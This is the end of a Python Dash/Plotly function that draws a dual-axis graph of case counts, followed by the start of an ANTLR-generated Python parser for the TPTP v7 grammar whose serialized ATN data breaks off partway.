yaxis="y1",
hovertemplate=hovertemplate,
),
go.Scatter(
x=pd.to_datetime(cases[x]),
y=cases[y2],
name=y2_name,
yaxis="y2",
hovertemplate=hovertemplate,
),
],
layout=go.Layout(
yaxis=dict(title=y1_name),
yaxis2=dict(title=y2_name, overlaying="y", side="right"),
legend=dict(x=0, y=1),
),
)
fig.update_xaxes(rangeslider_visible=True, showspikes=True)
fig.update_yaxes(showspikes=True, rangemode="tozero")
fig.layout.margin = go.layout.Margin(t=0, b=0, l=0, r=0)
return dcc.Graph(figure=fig,
config={
"displaylogo":
False,
"displayModeBar":
False,
"modeBarButtonsToRemove":
["toggleSpikelines", "autoScale2d"],
},
id=f"{parent_id}-graph")
return (
app.callback(
Output(parent_id, "children"),
Input(initial_trigger_id, "children"),
)(_reder_plot),
app.callback(
Output(f"{parent_id:s}-graph", "figure"),
Input(f"{parent_id:s}-graph", "relayoutData"),
State(f"{parent_id:s}-graph", "figure"),
)(_update_double_yaxis_range),
)
|
py | b414e12dcea5b2469f825b9327fd2dead51300c8 | # Generated from ../TPTP-ANTLR4-Grammar/tptp_v7_0_0_0.g4 by ANTLR 4.9
# encoding: utf-8
from antlr4 import *
from io import StringIO
import sys
if sys.version_info[1] > 5:
from typing import TextIO
else:
from typing.io import TextIO
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3e")
buf.write("\u0668\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31")
buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36")
buf.write("\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%\4&\t")
buf.write("&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.\t.\4")
buf.write("/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64\t\64")
buf.write("\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:\4;\t")
buf.write(";\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\tC\4D\t")
buf.write("D\4E\tE\4F\tF\4G\tG\4H\tH\4I\tI\4J\tJ\4K\tK\4L\tL\4M\t")
buf.write("M\4N\tN\4O\tO\4P\tP\4Q\tQ\4R\tR\4S\tS\4T\tT\4U\tU\4V\t")
buf.write("V\4W\tW\4X\tX\4Y\tY\4Z\tZ\4[\t[\4\\\t\\\4]\t]\4^\t^\4")
buf.write("_\t_\4`\t`\4a\ta\4b\tb\4c\tc\4d\td\4e\te\4f\tf\4g\tg\4")
buf.write("h\th\4i\ti\4j\tj\4k\tk\4l\tl\4m\tm\4n\tn\4o\to\4p\tp\4")
buf.write("q\tq\4r\tr\4s\ts\4t\tt\4u\tu\4v\tv\4w\tw\4x\tx\4y\ty\4")
buf.write("z\tz\4{\t{\4|\t|\4}\t}\4~\t~\4\177\t\177\4\u0080\t\u0080")
buf.write("\4\u0081\t\u0081\4\u0082\t\u0082\4\u0083\t\u0083\4\u0084")
buf.write("\t\u0084\4\u0085\t\u0085\4\u0086\t\u0086\4\u0087\t\u0087")
buf.write("\4\u0088\t\u0088\4\u0089\t\u0089\4\u008a\t\u008a\4\u008b")
buf.write("\t\u008b\4\u008c\t\u008c\4\u008d\t\u008d\4\u008e\t\u008e")
buf.write("\4\u008f\t\u008f\4\u0090\t\u0090\4\u0091\t\u0091\4\u0092")
buf.write("\t\u0092\4\u0093\t\u0093\4\u0094\t\u0094\4\u0095\t\u0095")
buf.write("\4\u0096\t\u0096\4\u0097\t\u0097\4\u0098\t\u0098\4\u0099")
buf.write("\t\u0099\4\u009a\t\u009a\4\u009b\t\u009b\4\u009c\t\u009c")
buf.write("\4\u009d\t\u009d\4\u009e\t\u009e\4\u009f\t\u009f\4\u00a0")
buf.write("\t\u00a0\4\u00a1\t\u00a1\4\u00a2\t\u00a2\4\u00a3\t\u00a3")
buf.write("\4\u00a4\t\u00a4\4\u00a5\t\u00a5\4\u00a6\t\u00a6\4\u00a7")
buf.write("\t\u00a7\4\u00a8\t\u00a8\4\u00a9\t\u00a9\4\u00aa\t\u00aa")
buf.write("\4\u00ab\t\u00ab\4\u00ac\t\u00ac\4\u00ad\t\u00ad\4\u00ae")
buf.write("\t\u00ae\4\u00af\t\u00af\4\u00b0\t\u00b0\4\u00b1\t\u00b1")
buf.write("\4\u00b2\t\u00b2\4\u00b3\t\u00b3\4\u00b4\t\u00b4\4\u00b5")
buf.write("\t\u00b5\4\u00b6\t\u00b6\4\u00b7\t\u00b7\4\u00b8\t\u00b8")
buf.write("\4\u00b9\t\u00b9\4\u00ba\t\u00ba\4\u00bb\t\u00bb\4\u00bc")
buf.write("\t\u00bc\4\u00bd\t\u00bd\4\u00be\t\u00be\4\u00bf\t\u00bf")
buf.write("\4\u00c0\t\u00c0\4\u00c1\t\u00c1\4\u00c2\t\u00c2\4\u00c3")
buf.write("\t\u00c3\4\u00c4\t\u00c4\4\u00c5\t\u00c5\4\u00c6\t\u00c6")
buf.write("\4\u00c7\t\u00c7\4\u00c8\t\u00c8\4\u00c9\t\u00c9\4\u00ca")
buf.write("\t\u00ca\3\2\7\2\u0196\n\2\f\2\16\2\u0199\13\2\3\2\3\2")
buf.write("\3\3\3\3\5\3\u019f\n\3\3\4\3\4\3\4\3\4\3\4\3\4\3\4\5\4")
buf.write("\u01a8\n\4\3\5\3\5\3\5\3\5\3\5\3\5\3\5\5\5\u01b1\n\5\3")
buf.write("\5\3\5\3\6\3\6\3\7\3\7\3\7\3\7\3\7\3\7\3\7\5\7\u01be\n")
buf.write("\7\3\7\3\7\3\b\3\b\3\b\3\b\3\b\3\b\3\b\5\b\u01c9\n\b\3")
buf.write("\b\3\b\3\t\3\t\3\t\3\t\3\t\3\t\3\t\5\t\u01d4\n\t\3\t\3")
buf.write("\t\3\n\3\n\3\n\3\n\3\n\3\n\3\n\5\n\u01df\n\n\3\n\3\n\3")
buf.write("\13\3\13\3\13\3\13\3\13\3\13\3\13\5\13\u01ea\n\13\3\13")
buf.write("\3\13\3\f\3\f\3\f\3\f\3\f\3\f\3\f\5\f\u01f5\n\f\3\f\3")
buf.write("\f\3\r\3\r\3\r\5\r\u01fc\n\r\3\16\3\16\3\17\3\17\5\17")
buf.write("\u0202\n\17\3\20\3\20\3\20\3\20\5\20\u0208\n\20\3\21\3")
buf.write("\21\3\21\5\21\u020d\n\21\3\22\3\22\3\22\3\22\3\23\3\23")
buf.write("\3\23\5\23\u0216\n\23\3\24\3\24\3\24\3\24\3\24\3\24\3")
buf.write("\24\3\24\7\24\u0220\n\24\f\24\16\24\u0223\13\24\3\25\3")
buf.write("\25\3\25\3\25\3\25\3\25\3\25\3\25\7\25\u022d\n\25\f\25")
buf.write("\16\25\u0230\13\25\3\26\3\26\3\26\3\26\3\26\3\26\3\26")
buf.write("\3\26\7\26\u023a\n\26\f\26\16\26\u023d\13\26\3\27\3\27")
buf.write("\3\27\3\27\3\27\3\27\3\27\3\27\3\27\3\27\5\27\u0249\n")
buf.write("\27\3\30\3\30\3\30\3\31\3\31\3\31\3\31\3\31\3\31\3\32")
buf.write("\3\32\3\32\7\32\u0257\n\32\f\32\16\32\u025a\13\32\3\33")
buf.write("\3\33\5\33\u025e\n\33\3\34\3\34\3\34\3\34\3\35\3\35\3")
buf.write("\35\3\35\3\35\3\36\3\36\3\36\3\36\5\36\u026d\n\36\3\37")
buf.write("\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3\37")
buf.write("\3\37\3\37\3\37\3\37\5\37\u027f\n\37\3 \3 \3 \5 \u0284")
buf.write("\n \3!\3!\3!\3!\3!\3!\3!\3!\3\"\3\"\3\"\3\"\3\"\3\"\3")
buf.write("#\3#\3$\3$\3$\3$\3%\3%\3%\3%\3%\5%\u029f\n%\3&\3&\3&\3")
buf.write("&\3\'\3\'\3\'\5\'\u02a8\n\'\3(\3(\3)\3)\3*\3*\3*\5*\u02b1")
buf.write("\n*\3+\3+\3+\3+\3+\3+\3+\3+\5+\u02bb\n+\3,\3,\3,\3,\3")
buf.write(",\3,\3,\3,\7,\u02c5\n,\f,\16,\u02c8\13,\3-\3-\3-\3-\3")
buf.write("-\3-\3-\3-\7-\u02d2\n-\f-\16-\u02d5\13-\3.\3.\3.\3.\3")
buf.write(".\3.\3.\3.\5.\u02df\n.\3/\3/\3/\3/\3/\3/\3/\3/\3/\3/\5")
buf.write("/\u02eb\n/\3\60\3\60\3\60\7\60\u02f0\n\60\f\60\16\60\u02f3")
buf.write("\13\60\3\61\3\61\5\61\u02f7\n\61\3\62\3\62\3\63\3\63\3")
buf.write("\63\5\63\u02fe\n\63\3\64\3\64\3\64\5\64\u0303\n\64\3\65")
buf.write("\3\65\5\65\u0307\n\65\3\66\3\66\3\66\3\66\3\67\3\67\5")
buf.write("\67\u030f\n\67\38\38\38\38\38\38\38\38\78\u0319\n8\f8")
buf.write("\168\u031c\138\39\39\39\39\39\39\39\39\79\u0326\n9\f9")
buf.write("\169\u0329\139\3:\3:\3:\3:\3:\3:\3:\3:\3:\5:\u0334\n:")
buf.write("\3;\3;\3;\3;\3;\3;\3;\3<\3<\3<\7<\u0340\n<\f<\16<\u0343")
buf.write("\13<\3=\3=\5=\u0347\n=\3>\3>\3>\3>\3?\3?\3?\3?\5?\u0351")
buf.write("\n?\3@\3@\3A\3A\3A\3A\3A\3A\3A\3A\3B\3B\3B\3B\3B\3B\3")
buf.write("B\3B\3B\3B\3B\3B\5B\u0369\nB\3C\3C\3C\3C\3C\5C\u0370\n")
buf.write("C\3D\3D\3D\7D\u0375\nD\fD\16D\u0378\13D\3E\3E\3E\3E\3")
buf.write("E\3E\3E\3E\5E\u0382\nE\3F\3F\3F\3F\3F\3F\3F\3F\5F\u038c")
buf.write("\nF\3G\3G\3G\3G\3G\5G\u0393\nG\3H\3H\3H\7H\u0398\nH\f")
buf.write("H\16H\u039b\13H\3I\3I\3I\3I\3I\3I\3I\3I\5I\u03a5\nI\3")
buf.write("J\3J\3J\3J\3J\3J\3J\3J\5J\u03af\nJ\3K\3K\3K\3K\3K\3K\3")
buf.write("K\3K\5K\u03b9\nK\3L\3L\3L\3L\3L\5L\u03c0\nL\3M\3M\3M\7")
buf.write("M\u03c5\nM\fM\16M\u03c8\13M\3N\3N\3N\3N\3N\3N\3N\3N\5")
buf.write("N\u03d2\nN\3O\3O\3O\3O\3P\3P\3P\3P\3P\3P\3P\5P\u03df\n")
buf.write("P\3Q\3Q\3Q\3Q\3Q\3Q\3Q\3R\3R\3R\3R\3R\5R\u03ed\nR\3S\3")
buf.write("S\3S\3S\3S\5S\u03f4\nS\3T\3T\3T\3T\3T\3T\3T\3T\5T\u03fe")
buf.write("\nT\3U\3U\3U\7U\u0403\nU\fU\16U\u0406\13U\3V\3V\3V\3V")
buf.write("\3W\3W\3W\3W\3W\3W\3W\3W\7W\u0414\nW\fW\16W\u0417\13W")
buf.write("\3X\3X\5X\u041b\nX\3Y\3Y\5Y\u041f\nY\3Z\3Z\3Z\3Z\3Z\3")
buf.write("Z\3Z\3[\3[\5[\u042a\n[\3\\\3\\\5\\\u042e\n\\\3]\3]\5]")
buf.write("\u0432\n]\3^\3^\3^\3^\3_\3_\5_\u043a\n_\3`\3`\3`\3`\3")
buf.write("`\3`\3`\3`\7`\u0444\n`\f`\16`\u0447\13`\3a\3a\3a\3a\3")
buf.write("a\3a\3a\3a\7a\u0451\na\fa\16a\u0454\13a\3b\3b\3b\3b\3")
buf.write("b\3b\3b\5b\u045d\nb\3c\3c\3c\3c\3c\3c\3c\3d\3d\3d\7d\u0469")
buf.write("\nd\fd\16d\u046c\13d\3e\3e\3e\3e\5e\u0472\ne\3f\3f\3f")
buf.write("\3f\3g\3g\3g\5g\u047b\ng\3h\3h\3i\3i\5i\u0481\ni\3j\3")
buf.write("j\3k\3k\3k\3k\3l\3l\3m\3m\3m\3m\3m\3m\5m\u0491\nm\3n\3")
buf.write("n\5n\u0495\nn\3o\3o\3p\3p\3p\3p\3p\3p\5p\u049f\np\3q\3")
buf.write("q\3q\3q\3q\3q\5q\u04a7\nq\3r\3r\3r\7r\u04ac\nr\fr\16r")
buf.write("\u04af\13r\3s\3s\3s\3s\3s\5s\u04b6\ns\3t\3t\3t\5t\u04bb")
buf.write("\nt\3u\3u\3u\3u\3u\3u\3u\3u\3v\3v\3v\3v\3v\3v\3v\3v\3")
buf.write("v\3v\3v\3v\5v\u04d1\nv\3w\3w\3w\3w\3w\5w\u04d8\nw\3x\3")
buf.write("x\3x\3x\3x\3x\3x\3x\5x\u04e2\nx\3y\3y\3y\3y\3y\5y\u04e9")
buf.write("\ny\3z\3z\3z\7z\u04ee\nz\fz\16z\u04f1\13z\3{\3{\3{\3{")
buf.write("\3{\5{\u04f8\n{\3|\3|\3|\3|\3|\3|\7|\u0500\n|\f|\16|\u0503")
buf.write("\13|\3}\3}\3}\3}\5}\u0509\n}\3~\3~\3~\5~\u050e\n~\3\177")
buf.write("\3\177\3\u0080\3\u0080\3\u0081\3\u0081\3\u0081\3\u0081")
buf.write("\5\u0081\u0518\n\u0081\3\u0082\3\u0082\5\u0082\u051c\n")
buf.write("\u0082\3\u0083\3\u0083\3\u0084\3\u0084\5\u0084\u0522\n")
buf.write("\u0084\3\u0085\3\u0085\3\u0086\3\u0086\3\u0087\3\u0087")
buf.write("\3\u0088\3\u0088\3\u0089\3\u0089\3\u008a\3\u008a\3\u008b")
buf.write("\3\u008b\3\u008c\3\u008c\3\u008d\3\u008d\5\u008d\u0536")
buf.write("\n\u008d\3\u008e\3\u008e\5\u008e\u053a\n\u008e\3\u008f")
buf.write("\3\u008f\3\u0090\3\u0090\3\u0091\3\u0091\3\u0092\3\u0092")
buf.write("\3\u0093\3\u0093\3\u0094\3\u0094\3\u0095\3\u0095\3\u0096")
buf.write("\3\u0096\3\u0097\3\u0097\3\u0098\3\u0098\5\u0098\u0550")
buf.write("\n\u0098\3\u0099\3\u0099\3\u009a\3\u009a\3\u009a\3\u009a")
buf.write("\3\u009a\3\u009a\3\u009a\3\u009a\5\u009a\u055c\n\u009a")
buf.write("\3\u009b\3\u009b\3\u009b\7\u009b\u0561\n\u009b\f\u009b")
buf.write("\16\u009b\u0564\13\u009b\3\u009c\3\u009c\5\u009c\u0568")
buf.write("\n\u009c\3\u009d\3\u009d\3\u009d\3\u009d\3\u009d\3\u009d")
buf.write("\3\u009d\3\u009d\3\u009e\3\u009e\3\u009f\3\u009f\3\u009f")
buf.write("\3\u009f\3\u009f\5\u009f\u0579\n\u009f\3\u00a0\3\u00a0")
buf.write("\3\u00a0\7\u00a0\u057e\n\u00a0\f\u00a0\16\u00a0\u0581")
buf.write("\13\u00a0\3\u00a1\3\u00a1\5\u00a1\u0585\n\u00a1\3\u00a2")
buf.write("\3\u00a2\3\u00a2\3\u00a3\3\u00a3\3\u00a3\5\u00a3\u058d")
buf.write("\n\u00a3\3\u00a3\3\u00a3\3\u00a4\3\u00a4\3\u00a5\3\u00a5")
buf.write("\3\u00a5\5\u00a5\u0596\n\u00a5\3\u00a6\3\u00a6\3\u00a6")
buf.write("\5\u00a6\u059b\n\u00a6\3\u00a6\3\u00a6\3\u00a7\3\u00a7")
buf.write("\3\u00a7\3\u00a8\3\u00a8\3\u00a8\5\u00a8\u05a5\n\u00a8")
buf.write("\3\u00a8\3\u00a8\3\u00a9\3\u00a9\3\u00aa\3\u00aa\3\u00aa")
buf.write("\5\u00aa\u05ae\n\u00aa\3\u00aa\3\u00aa\3\u00ab\3\u00ab")
buf.write("\3\u00ac\3\u00ac\3\u00ac\3\u00ad\3\u00ad\3\u00ad\3\u00ad")
buf.write("\3\u00ad\3\u00ad\5\u00ad\u05bd\n\u00ad\3\u00ae\3\u00ae")
buf.write("\3\u00ae\7\u00ae\u05c2\n\u00ae\f\u00ae\16\u00ae\u05c5")
buf.write("\13\u00ae\3\u00af\3\u00af\3\u00af\5\u00af\u05ca\n\u00af")
buf.write("\3\u00b0\3\u00b0\5\u00b0\u05ce\n\u00b0\3\u00b1\3\u00b1")
buf.write("\3\u00b1\3\u00b1\3\u00b2\3\u00b2\3\u00b2\3\u00b2\3\u00b3")
buf.write("\3\u00b3\3\u00b3\3\u00b3\5\u00b3\u05dc\n\u00b3\3\u00b4")
buf.write("\3\u00b4\3\u00b4\3\u00b4\3\u00b4\5\u00b4\u05e3\n\u00b4")
buf.write("\3\u00b5\3\u00b5\3\u00b6\3\u00b6\3\u00b6\3\u00b6\3\u00b6")
buf.write("\3\u00b6\3\u00b6\3\u00b7\3\u00b7\3\u00b7\3\u00b7\3\u00b7")
buf.write("\3\u00b7\3\u00b8\3\u00b8\3\u00b8\3\u00b8\3\u00b9\3\u00b9")
buf.write("\3\u00b9\3\u00b9\3\u00b9\3\u00b9\3\u00b9\3\u00b9\3\u00ba")
buf.write("\3\u00ba\3\u00ba\7\u00ba\u0603\n\u00ba\f\u00ba\16\u00ba")
buf.write("\u0606\13\u00ba\3\u00bb\3\u00bb\5\u00bb\u060a\n\u00bb")
buf.write("\3\u00bc\3\u00bc\3\u00bc\5\u00bc\u060f\n\u00bc\3\u00bc")
buf.write("\3\u00bc\3\u00bd\3\u00bd\3\u00bd\3\u00bd\3\u00bd\3\u00be")
buf.write("\3\u00be\3\u00be\7\u00be\u061b\n\u00be\f\u00be\16\u00be")
buf.write("\u061e\13\u00be\3\u00bf\3\u00bf\3\u00bf\3\u00bf\3\u00bf")
buf.write("\3\u00bf\5\u00bf\u0626\n\u00bf\3\u00c0\3\u00c0\3\u00c0")
buf.write("\3\u00c0\3\u00c0\3\u00c0\5\u00c0\u062e\n\u00c0\3\u00c1")
buf.write("\3\u00c1\3\u00c1\3\u00c1\3\u00c1\3\u00c2\3\u00c2\3\u00c2")
buf.write("\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2")
buf.write("\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2")
buf.write("\3\u00c2\3\u00c2\3\u00c2\5\u00c2\u0649\n\u00c2\3\u00c3")
buf.write("\3\u00c3\3\u00c3\3\u00c3\3\u00c3\5\u00c3\u0650\n\u00c3")
buf.write("\3\u00c4\3\u00c4\3\u00c4\7\u00c4\u0655\n\u00c4\f\u00c4")
buf.write("\16\u00c4\u0658\13\u00c4\3\u00c5\3\u00c5\5\u00c5\u065c")
buf.write("\n\u00c5\3\u00c6\3\u00c6\3\u00c7\3\u00c7\3\u00c8\3\u00c8")
buf.write("\3\u00c9\3\u00c9\3\u00ca\3\u00ca\3\u00ca\2\r&(*VXnp\u00ac")
buf.write("\u00be\u00c0\u00f6\u00cb\2\4\6\b\n\f\16\20\22\24\26\30")
buf.write("\32\34\36 \"$&(*,.\60\62\64\668:<>@BDFHJLNPRTVXZ\\^`b")
buf.write("dfhjlnprtvxz|~\u0080\u0082\u0084\u0086\u0088\u008a\u008c")
buf.write("\u008e\u0090\u0092\u0094\u0096\u0098\u009a\u009c\u009e")
buf.write("\u00a0\u00a2\u00a4\u00a6\u00a8\u00aa\u00ac\u00ae\u00b0")
buf.write("\u00b2\u00b4\u00b6\u00b8\u00ba\u00bc\u00be\u00c0\u00c2")
buf.write("\u00c4\u00c6\u00c8\u00ca\u00cc\u00ce\u00d0\u00d2\u00d4")
buf.write("\u00d6\u00d8\u00da\u00dc\u00de\u00e0\u00e2\u00e4\u00e6")
buf.write("\u00e8\u00ea\u00ec\u00ee\u00f0\u00f2\u00f4\u00f6\u00f8")
buf.write("\u00fa\u00fc\u00fe\u0100\u0102\u0104\u0106\u0108\u010a")
buf.write("\u010c\u010e\u0110\u0112\u0114\u0116\u0118\u011a\u011c")
buf.write("\u011e\u0120\u0122\u0124\u0126\u0128\u012a\u012c\u012e")
buf.write("\u0130\u0132\u0134\u0136\u0138\u013a\u013c\u013e\u0140")
buf.write("\u0142\u0144\u0146\u0148\u014a\u014c\u014e\u0150\u0152")
buf.write("\u0154\u0156\u0158\u015a\u015c\u015e\u0160\u0162\u0164")
buf.write("\u0166\u0168\u016a\u016c\u016e\u0170\u0172\u0174\u0176")
buf.write("\u0178\u017a\u017c\u017e\u0180\u0182\u0184\u0186\u0188")
buf.write("\u018a\u018c\u018e\u0190\u0192\2\13\5\2??AACC\4\288==")
buf.write("\7\2\67\67<<@@BBDD\4\2;;>>\3\2\60\65\3\2./\4\2::FF\3\2")
buf.write("`a\5\2LLOORR\2\u0657\2\u0197\3\2\2\2\4\u019e\3\2\2\2\6")
buf.write("\u01a7\3\2\2\2\b\u01a9\3\2\2\2\n\u01b4\3\2\2\2\f\u01b6")
buf.write("\3\2\2\2\16\u01c1\3\2\2\2\20\u01cc\3\2\2\2\22\u01d7\3")
buf.write("\2\2\2\24\u01e2\3\2\2\2\26\u01ed\3\2\2\2\30\u01f8\3\2")
buf.write("\2\2\32\u01fd\3\2\2\2\34\u0201\3\2\2\2\36\u0207\3\2\2")
buf.write("\2 \u020c\3\2\2\2\"\u020e\3\2\2\2$\u0215\3\2\2\2&\u0217")
buf.write("\3\2\2\2(\u0224\3\2\2\2*\u0231\3\2\2\2,\u0248\3\2\2\2")
buf.write(".\u024a\3\2\2\2\60\u024d\3\2\2\2\62\u0253\3\2\2\2\64\u025d")
buf.write("\3\2\2\2\66\u025f\3\2\2\28\u0263\3\2\2\2:\u026c\3\2\2")
buf.write("\2<\u027e\3\2\2\2>\u0283\3\2\2\2@\u0285\3\2\2\2B\u028d")
buf.write("\3\2\2\2D\u0293\3\2\2\2F\u0295\3\2\2\2H\u029e\3\2\2\2")
buf.write("J\u02a0\3\2\2\2L\u02a7\3\2\2\2N\u02a9\3\2\2\2P\u02ab\3")
buf.write("\2\2\2R\u02b0\3\2\2\2T\u02ba\3\2\2\2V\u02bc\3\2\2\2X\u02c9")
buf.write("\3\2\2\2Z\u02de\3\2\2\2\\\u02ea\3\2\2\2^\u02ec\3\2\2\2")
buf.write("`\u02f6\3\2\2\2b\u02f8\3\2\2\2d\u02fd\3\2\2\2f\u0302\3")
buf.write("\2\2\2h\u0306\3\2\2\2j\u0308\3\2\2\2l\u030e\3\2\2\2n\u0310")
buf.write("\3\2\2\2p\u031d\3\2\2\2r\u0333\3\2\2\2t\u0335\3\2\2\2")
buf.write("v\u033c\3\2\2\2x\u0346\3\2\2\2z\u0348\3\2\2\2|\u0350\3")
buf.write("\2\2\2~\u0352\3\2\2\2\u0080\u0354\3\2\2\2\u0082\u0368")
buf.write("\3\2\2\2\u0084\u036f\3\2\2\2\u0086\u0371\3\2\2\2\u0088")
buf.write("\u0381\3\2\2\2\u008a\u038b\3\2\2\2\u008c\u0392\3\2\2\2")
buf.write("\u008e\u0394\3\2\2\2\u0090\u03a4\3\2\2\2\u0092\u03ae\3")
buf.write("\2\2\2\u0094\u03b8\3\2\2\2\u0096\u03bf\3\2\2\2\u0098\u03c1")
buf.write("\3\2\2\2\u009a\u03d1\3\2\2\2\u009c\u03d3\3\2\2\2\u009e")
buf.write("\u03de\3\2\2\2\u00a0\u03e0\3\2\2\2\u00a2\u03ec\3\2\2\2")
buf.write("\u00a4\u03f3\3\2\2\2\u00a6\u03fd\3\2\2\2\u00a8\u03ff\3")
buf.write("\2\2\2\u00aa\u0407\3\2\2\2\u00ac\u040b\3\2\2\2\u00ae\u041a")
buf.write("\3\2\2\2\u00b0\u041e\3\2\2\2\u00b2\u0420\3\2\2\2\u00b4")
buf.write("\u0429\3\2\2\2\u00b6\u042d\3\2\2\2\u00b8\u0431\3\2\2\2")
buf.write("\u00ba\u0433\3\2\2\2\u00bc\u0439\3\2\2\2\u00be\u043b\3")
buf.write("\2\2\2\u00c0\u0448\3\2\2\2\u00c2\u045c\3\2\2\2\u00c4\u045e")
buf.write("\3\2\2\2\u00c6\u0465\3\2\2\2\u00c8\u0471\3\2\2\2\u00ca")
buf.write("\u0473\3\2\2\2\u00cc\u047a\3\2\2\2\u00ce\u047c\3\2\2\2")
buf.write("\u00d0\u0480\3\2\2\2\u00d2\u0482\3\2\2\2\u00d4\u0484\3")
buf.write("\2\2\2\u00d6\u0488\3\2\2\2\u00d8\u0490\3\2\2\2\u00da\u0494")
buf.write("\3\2\2\2\u00dc\u0496\3\2\2\2\u00de\u049e\3\2\2\2\u00e0")
buf.write("\u04a6\3\2\2\2\u00e2\u04a8\3\2\2\2\u00e4\u04b5\3\2\2\2")
buf.write("\u00e6\u04ba\3\2\2\2\u00e8\u04bc\3\2\2\2\u00ea\u04d0\3")
buf.write("\2\2\2\u00ec\u04d7\3\2\2\2\u00ee\u04e1\3\2\2\2\u00f0\u04e8")
buf.write("\3\2\2\2\u00f2\u04ea\3\2\2\2\u00f4\u04f7\3\2\2\2\u00f6")
buf.write("\u04f9\3\2\2\2\u00f8\u0508\3\2\2\2\u00fa\u050d\3\2\2\2")
buf.write("\u00fc\u050f\3\2\2\2\u00fe\u0511\3\2\2\2\u0100\u0517\3")
buf.write("\2\2\2\u0102\u051b\3\2\2\2\u0104\u051d\3\2\2\2\u0106\u0521")
buf.write("\3\2\2\2\u0108\u0523\3\2\2\2\u010a\u0525\3\2\2\2\u010c")
buf.write("\u0527\3\2\2\2\u010e\u0529\3\2\2\2\u0110\u052b\3\2\2\2")
buf.write("\u0112\u052d\3\2\2\2\u0114\u052f\3\2\2\2\u0116\u0531\3")
buf.write("\2\2\2\u0118\u0535\3\2\2\2\u011a\u0539\3\2\2\2\u011c\u053b")
buf.write("\3\2\2\2\u011e\u053d\3\2\2\2\u0120\u053f\3\2\2\2\u0122")
buf.write("\u0541\3\2\2\2\u0124\u0543\3\2\2\2\u0126\u0545\3\2\2\2")
buf.write("\u0128\u0547\3\2\2\2\u012a\u0549\3\2\2\2\u012c\u054b\3")
buf.write("\2\2\2\u012e\u054f\3\2\2\2\u0130\u0551\3\2\2\2\u0132\u055b")
buf.write("\3\2\2\2\u0134\u055d\3\2\2\2\u0136\u0567\3\2\2\2\u0138")
buf.write("\u0569\3\2\2\2\u013a\u0571\3\2\2\2\u013c\u0578\3\2\2\2")
buf.write("\u013e\u057a\3\2\2\2\u0140\u0582\3\2\2\2\u0142\u0586\3")
buf.write("\2\2\2\u0144\u0589\3\2\2\2\u0146\u0590\3\2\2\2\u0148\u0595")
buf.write("\3\2\2\2\u014a\u0597\3\2\2\2\u014c\u059e\3\2\2\2\u014e")
buf.write("\u05a1\3\2\2\2\u0150\u05a8\3\2\2\2\u0152\u05aa\3\2\2\2")
buf.write("\u0154\u05b1\3\2\2\2\u0156\u05b3\3\2\2\2\u0158\u05bc\3")
buf.write("\2\2\2\u015a\u05be\3\2\2\2\u015c\u05c9\3\2\2\2\u015e\u05cd")
buf.write("\3\2\2\2\u0160\u05cf\3\2\2\2\u0162\u05d3\3\2\2\2\u0164")
buf.write("\u05db\3\2\2\2\u0166\u05e2\3\2\2\2\u0168\u05e4\3\2\2\2")
buf.write("\u016a\u05e6\3\2\2\2\u016c\u05ed\3\2\2\2\u016e\u05f3\3")
buf.write("\2\2\2\u0170\u05f7\3\2\2\2\u0172\u05ff\3\2\2\2\u0174\u0609")
buf.write("\3\2\2\2\u0176\u060b\3\2\2\2\u0178\u0612\3\2\2\2\u017a")
buf.write("\u0617\3\2\2\2\u017c\u0625\3\2\2\2\u017e\u062d\3\2\2\2")
buf.write("\u0180\u062f\3\2\2\2\u0182\u0648\3\2\2\2\u0184\u064f\3")
buf.write("\2\2\2\u0186\u0651\3\2\2\2\u0188\u065b\3\2\2\2\u018a\u065d")
buf.write("\3\2\2\2\u018c\u065f\3\2\2\2\u018e\u0661\3\2\2\2\u0190")
buf.write("\u0663\3\2\2\2\u0192\u0665\3\2\2\2\u0194\u0196\5\4\3\2")
buf.write("\u0195\u0194\3\2\2\2\u0196\u0199\3\2\2\2\u0197\u0195\3")
buf.write("\2\2\2\u0197\u0198\3\2\2\2\u0198\u019a\3\2\2\2\u0199\u0197")
buf.write("\3\2\2\2\u019a\u019b\7\2\2\3\u019b\3\3\2\2\2\u019c\u019f")
buf.write("\5\6\4\2\u019d\u019f\5\u0176\u00bc\2\u019e\u019c\3\2\2")
buf.write("\2\u019e\u019d\3\2\2\2\u019f\5\3\2\2\2\u01a0\u01a8\5\f")
buf.write("\7\2\u01a1\u01a8\5\16\b\2\u01a2\u01a8\5\20\t\2\u01a3\u01a8")
buf.write("\5\22\n\2\u01a4\u01a8\5\24\13\2\u01a5\u01a8\5\26\f\2\u01a6")
buf.write("\u01a8\5\b\5\2\u01a7\u01a0\3\2\2\2\u01a7\u01a1\3\2\2\2")
buf.write("\u01a7\u01a2\3\2\2\2\u01a7\u01a3\3\2\2\2\u01a7\u01a4\3")
buf.write("\2\2\2\u01a7\u01a5\3\2\2\2\u01a7\u01a6\3\2\2\2\u01a8\7")
buf.write("\3\2\2\2\u01a9\u01aa\7\3\2\2\u01aa\u01ab\5\u0188\u00c5")
buf.write("\2\u01ab\u01ac\7\4\2\2\u01ac\u01ad\5\32\16\2\u01ad\u01ae")
buf.write("\7\4\2\2\u01ae\u01b0\5\n\6\2\u01af\u01b1\5\30\r\2\u01b0")
buf.write("\u01af\3\2\2\2\u01b0\u01b1\3\2\2\2\u01b1\u01b2\3\2\2\2")
